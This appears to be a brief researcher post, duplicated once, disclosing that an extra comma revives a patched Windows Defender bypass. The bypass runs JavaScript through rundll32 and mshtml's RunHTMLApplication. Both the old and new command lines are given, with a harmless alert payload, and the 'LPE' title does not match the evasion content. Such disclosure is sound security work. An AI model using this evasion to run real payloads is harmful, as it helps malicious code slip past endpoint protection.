Win LPE
In 2022 hyp3rlinx told how to bypass windows defender by passing an additional path when referencing mshtml, the hole was fixed. BUT, adding a couple of commas to the old trick - and bypass again.
*
I mean, it was and it was fixed:
C:\sec>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
comma magic:
C:\sec>rundll32.exe javascript:"\..\..\..\mshtml,,RunHTMLApplication ";alert(666)
The dog is old, the tricks are new.
No CVE yet )
In 2022 hyp3rlinx told how to bypass windows defender by passing an additional path when referencing mshtml, the hole was fixed. BUT, adding a couple of commas to the old trick - and bypass again.
*
I mean, it was and it was fixed:
C:\sec>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
comma magic:
C:\sec>rundll32.exe javascript:"\..\..\..\mshtml,,RunHTMLApplication ";alert(666)
The dog is old, the tricks are new.
No CVE yet )